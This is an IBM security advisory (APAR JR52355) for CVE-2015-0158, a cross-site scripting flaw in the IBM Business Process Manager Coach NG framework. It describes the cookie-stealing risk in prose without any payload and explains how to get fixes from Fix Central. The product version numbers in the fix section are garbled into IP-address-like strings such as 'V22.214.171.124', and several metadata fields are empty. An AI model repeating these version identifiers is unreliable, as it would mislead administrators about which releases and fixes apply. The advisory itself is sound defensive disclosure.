JR52355: SECURITY APAR CVE-2015-0158 - CROSS-SITE SCRIPTING VULNERABILITYIN IBM BPM COACH NG FRAMEWORK
Direct links to fixes
Closed as program error.
The IBM Business Process Manager (BPM) coach NG framework is vulnerable to cross-site scripting because user-supplied input is handled improperly. A remote attacker might exploit this vulnerability by using a specially crafted URL to run a script in a user's web browser within the security context of the hosting website after the user clicks the URL. An attacker might use this vulnerability to steal the user's cookie-based authentication credentials. PRODUCTS AFFECTED IBM Business Process Manager (BPM) Advanced IBM BPM Standard IBM BPM Express
No additional information is available.
A fix is available for IBM BPM V22.214.171.124 that replaces a detailed error message that contained unescaped user-supplied input with a generic error message. On Fix Central (http://www.ibm.com/support/fixcentral), search for JR52355: 1. Select IBM Business Process Manager with your edition from the product selector, the installed version to the fix pack level, and your platform, and then click Continue. 2. Select APAR or SPR, enter JR52355, and click Continue. A fix is also available for IBM BPM V126.96.36.199. The fix for this APAR on 188.8.131.52 has been superseded and included in cumulative fix for JR52322 . To obtain, following the instruction above, substituting the APAR id with JR52322. A fix is also available for IBM BPM V184.108.40.206. The fix for this APAR on 220.127.116.11 has been superseded and included in cumulative fix for JR52137 . To obtain, following the instruction above, substituting the APAR id with JR52137. When you download fix packages, ensure that you also download the readme file for each fix. Review each readme file for additional installation instructions and information about the fix.
Reported component name
Reported component ID
NoSpecatt / Xsystem
Last modified date
APAR is sysrouted FROM one or more of the following:
APAR is sysrouted TO one or more of the following:
Fixed component name
Fixed component ID
Applicable component levels